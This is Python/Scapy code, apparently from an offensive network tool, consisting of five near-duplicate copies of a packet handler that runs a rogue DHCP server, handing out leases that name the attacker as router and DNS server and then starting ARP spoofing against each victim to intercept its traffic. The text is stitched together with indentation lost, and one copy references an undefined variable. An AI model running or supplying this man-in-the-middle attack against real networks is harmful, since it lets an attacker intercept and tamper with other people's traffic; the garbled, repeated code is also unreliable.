def pkt_handler(self, pkt):
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam,hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it, we're golden. Otherwise
# we need to check if the one they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
lease /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
lease /= DHCP(options=[('message-type','ack'),
('server_id', self.gateway),
('lease_time', 86400),
('subnet_mask', '255.255.255.0'),
('router', self.gateway),
('name_server', self.gateway),
'end'])
sendp(lease, loop=False)
if self.dump_data: util.Msg('Handed \'%s\' out to \'%s\''%(self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = ARPSpoof()
tmp.to_ip = self.curr_ip
tmp.from_ip = self.gateway
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured for \'%s\''%self.curr_ip)
else:
if self.dump_data: util.Error('ARP session unsuccessful for %s! You may not be able to get in the middle of them!'%self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam,hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
offer /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
offer /= DHCP(options=[('message-type', 'offer'),
('subnet_mask','255.255.255.0'),
('lease_time', 86400),
('name_server', self.gateway),
('router',self.gateway),
'end'])
sendp(offer, loop=False)
if self.dump_data: util.Msg('Sent DHCP offer for \'%s\' to \'%s\''%(self.curr_ip, pkt[Ether].src))
def pkt_handler(self, pkt):
""" Handle traffic; wait for DHCPREQ or DHCPDISC; there are two cases. Most systems, if they've
previously connected to the network, will skip the discovery stage and make a DHCP REQUEST.
We can respond with a DHCPACK and hopefully get it; if we don't, we can still ARPP the host.
New systems with DHCPDISCOVER first; in this case, we can quite easily gain control, give it
our own address, and ARPP it.
"""
gateway = self.config["gateway"].value
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam, hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == "requested_addr":
requested_addr = item[1]
# if the IP address is the one we've reserved for it,
# we're golden. Otherwise we need to check if the one
# they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.config["net_mask"].value.split("/")[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst="ff:ff:ff:ff:ff:ff", src=hw)
lease /= IP(src=gateway, dst="255.255.255.255")
lease /= UDP(sport=67, dport=68)
lease /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src), yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
lease /= DHCP(
options=[
("message-type", "ack"),
("server_id", gateway),
("lease_time", 86400),
("subnet_mask", "255.255.255.0"),
("router", gateway),
("name_server", gateway),
"end",
]
)
sendp(lease, loop=False)
util.Msg("Handed '%s' out to '%s'" % (self.curr_ip, pkt[Ether].src))
util.debug("Initializing ARP spoofing...")
tmp = arp()
victim = (self.curr_ip, getmacbyip(self.curr_ip))
target = (gateway, hw)
tmp.victim = victim
tmp.target = target
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug("ARP spoofing successfully configured " "for '%s'" % self.curr_ip)
else:
util.Msg(
"ARP session unsuccessful for %s! You may not"
"be able to get in the middle of them!" % self.curr_ip
)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam, hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.config["net_mask"].value.split("/")[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst="ff:ff:ff:ff:ff:ff", src=hw)
offer /= IP(src=gateway, dst="255.255.255.255")
offer /= UDP(sport=67, dport=68)
offer /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src), yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
offer /= DHCP(
options=[
("message-type", "offer"),
("subnet_mask", "255.255.255.0"),
("lease_time", 86400),
("name_server", gateway),
("router", gateway),
"end",
]
)
sendp(offer, loop=False)
util.Msg("Sent DHCP offer for '%s' to '%s'" % (self.curr_ip, pkt[Ether].src))
def pkt_handler(self, pkt):
""" Handle traffic; wait for DHCPREQ or DHCPDISC; there are two cases. Most systems, if they've
previously connected to the network, will skip the discovery stage and make a DHCP REQUEST.
We can respond with a DHCPACK and hopefully get it; if we don't, we can still ARPP the host.
New systems with DHCPDISCOVER first; in this case, we can quite easily gain control, give it
our own address, and ARPP it.
"""
gateway = self.config['gateway'].value
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam, hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it,
# we're golden. Otherwise we need to check if the one
# they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.config['net_mask'].value \
.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
lease /= IP(src=gateway, dst='255.255.255.255')
lease /= UDP(sport=67, dport=68)
lease /= BOOTP(op=2,
chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip,
xid=pkt[BOOTP].xid)
lease /= DHCP(options=[(
'message-type',
'ack'), ('server_id', gateway), (
'lease_time',
86400), ('subnet_mask',
'255.255.255.0'), (
'router',
gateway), ('name_server',
gateway), 'end'])
sendp(lease, loop=False)
util.Msg('Handed \'%s\' out to \'%s\'' %
(self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = arp()
victim = (self.curr_ip, getmacbyip(self.curr_ip))
target = (gateway, hw)
tmp.victim = victim
tmp.target = target
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured '
'for \'%s\'' % self.curr_ip)
else:
util.Msg(
'ARP session unsuccessful for %s! You may not'
'be able to get in the middle of them!' %
self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam, hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.config['net_mask'].value \
.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
offer /= IP(src=gateway, dst='255.255.255.255')
offer /= UDP(sport=67, dport=68)
offer /= BOOTP(op=2,
chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip,
xid=pkt[BOOTP].xid)
offer /= DHCP(options=[(
'message-type',
'offer'), ('subnet_mask',
'255.255.255.0'), (
'lease_time',
86400), ('name_server',
gateway), ('router',
gateway), 'end'])
sendp(offer, loop=False)
util.Msg('Sent DHCP offer for \'%s\' to \'%s\'' %
(self.curr_ip, pkt[Ether].src))
def pkt_handler(self, pkt):
""" Handle traffic; wait for DHCPREQ or DHCPDISC; there are two cases. Most systems, if they've
previously connected to the network, will skip the discovery stage and make a DHCP REQUEST.
We can respond with a DHCPACK and hopefully get it; if we don't, we can still ARPP the host.
New systems with DHCPDISCOVER first; in this case, we can quite easily gain control, give it
our own address, and ARPP it.
"""
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam, hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it,
# we're golden. Otherwise we need to check if the one
# they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
lease /= IP(src=self.gateway, dst='255.255.255.255')
lease /= UDP(sport=67, dport=68)
lease /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
lease /= DHCP(options=[('message-type', 'ack'),
('server_id', self.gateway),
('lease_time', 86400),
('subnet_mask', '255.255.255.0'),
('router', self.gateway),
('name_server', self.gateway),
'end'])
sendp(lease, loop=False)
log_msg('Handed \'%s\' out to \'%s\''
% (self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = ARPSpoof()
victim = (to_ip, getmacbyip(to_ip))
target = (self.gateway, hw)
tmp.victim = victim
tmp.target = self.curr_ip
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured '
'for \'%s\'' % self.curr_ip)
else:
log_msg('ARP session unsuccessful for %s! You may not'
'be able to get in the middle of them!' % self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam, hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
offer /= IP(src=self.gateway, dst='255.255.255.255')
offer /= UDP(sport=67, dport=68)
offer /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
offer /= DHCP(options=[('message-type', 'offer'),
('subnet_mask', '255.255.255.0'),
('lease_time', 86400),
('name_server', self.gateway),
('router', self.gateway),
'end'])
sendp(offer, loop=False)
log_msg('Sent DHCP offer for \'%s\' to \'%s\''
% (self.curr_ip, pkt[Ether].src))
def pkt_handler(self, pkt):
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam,hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it, we're golden. Otherwise
# we need to check if the one they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
lease /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
lease /= DHCP(options=[('message-type','ack'),
('server_id', self.gateway),
('lease_time', 86400),
('subnet_mask', '255.255.255.0'),
('router', self.gateway),
('name_server', self.gateway),
'end'])
sendp(lease, loop=False)
if self.dump_data: util.Msg('Handed \'%s\' out to \'%s\''%(self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = ARPSpoof()
tmp.to_ip = self.curr_ip
tmp.from_ip = self.gateway
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured for \'%s\''%self.curr_ip)
else:
if self.dump_data: util.Error('ARP session unsuccessful for %s! You may not be able to get in the middle of them!'%self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam,hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.net_mask.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
offer /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
offer /= DHCP(options=[('message-type', 'offer'),
('subnet_mask','255.255.255.0'),
('lease_time', 86400),
('name_server', self.gateway),
('router',self.gateway),
'end'])
sendp(offer, loop=False)
if self.dump_data: util.Msg('Sent DHCP offer for \'%s\' to \'%s\''%(self.curr_ip, pkt[Ether].src))
